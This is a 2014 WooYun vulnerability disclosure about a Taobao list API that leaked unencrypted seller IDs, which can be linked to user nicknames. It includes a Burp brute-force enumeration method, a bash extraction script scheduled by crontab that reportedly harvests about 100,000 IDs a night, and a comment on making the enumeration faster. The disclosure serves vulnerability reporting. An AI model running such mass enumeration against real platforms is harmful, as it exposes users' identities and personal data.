当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082990

漏洞标题:淘宝某接口泄露用户敏感信息(可获取匿名卖家ID等信息,附批量统计脚本)

相关厂商:淘宝网

漏洞作者: 看什麼看

提交时间:2014-11-12 14:48

修复时间:2014-12-27 14:50

公开时间:2014-12-27 14:50

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-12: 细节已通知厂商并且等待厂商处理中
2014-11-13: 厂商已经确认,细节仅向厂商公开
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-27: 细节向公众公开

简要描述:

通過這個接口能得到好多信息,包括未加密的用戶id。

详细说明:

http://list.taobao.com/itemlist/default.htm?json=on&atype=b&cat=50026909
然後一搜,https://wen.lu/?#q=site:taobao.com+%22status%22:+%7B+%22code%22:+%22200%22+,+%22url%22:+%22%22+%7D
發現這個是通用的接口。只要改後面的cat就可以了。
分析一下,發現user_number_id就是user_id。未加密的。
舉例子:
比如返回的這條:
"storeLink":"http://store.taobao.com/shop/view_shop.htm?user_number_id=144161231&ssid=r11",
user_number_id是144161231
根據 WooYun: 淘宝网泄露匿名评论买家ID等信息
http://jianghu.taobao.com/u/MTQ0MTYxMjMx/front.htm
自動跳轉到http://my.taobao.com/UvFQ0vFxYvCvY, 後面的是加密的id

1.jpg


http://rate.taobao.com/user-rate-UvFQ0vFxYvCvY.htm, 得到用戶昵稱。

2.jpg


攻擊方法:
1.直接burp暴力枚舉,加上時延。
2.寫個腳本過濾,去重。取名grep.sh

ls -l /tmp/burp*.tmp/ > ~/Develop/taobao_userid/src/taobao_userid/cat
for file in /tmp/burp*.tmp/*
do
    echo ${file} >> ~/Develop/taobao_userid/src/taobao_userid/aaa
    cat ${file} | grep "user_number_id=" | awk '{split($0,a,"=");print a[2]}' | awk '{split($0,a,"&");print a[1]}' >> "~/Develop/taobao_userid/src/taobao_userid/ccc"
    rm ${file}
done
sort ~/Develop/taobao_userid/src/taobao_userid/ccc | uniq > ~/Develop/taobao_userid/src/taobao_userid/ccc.uniq
cp ~/Develop/taobao_userid/src/taobao_userid/ccc{.uniq,}


3.crontab -e
@hourly ~/Develop/taobao_userid/src/taobao_userid/grep.sh

漏洞证明:

mask 区域 
*****354*****
*****721*****
*****249*****
*****410*****
*****680*****
*****715*****
*****754*****
*****612*****
*****548*****
*****884*****
*****599*****
*****148*****
*****404*****
*****845*****
*****901*****
*****112*****
*****691*****
*****374*****
*****323*****
*****764*****
*****118*****
*****939*****
*****267*****

---
一個晚上10w條的樣子。

修复方案:

版权声明:转载请注明来源 看什麼看@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-11-13 09:31

厂商回复:

感谢你对我们的支持与关注,该问题我们正在修复

最新状态:

暂无

漏洞评价:

评论

  1. 2014-11-16 02:05 | 看什麼看 ( 路人 | Rank:16 漏洞数:4 | 知有飄零,畢竟飄零,便是飄零也感卿)

    http://list.taobao.com/browse/cat-0.htm用這個分類,過濾得到catid,暴力更加高效。http://list.taobao.com/itemlist/default.htm?json=on&atype=b&cat=50026909本來就帶nickname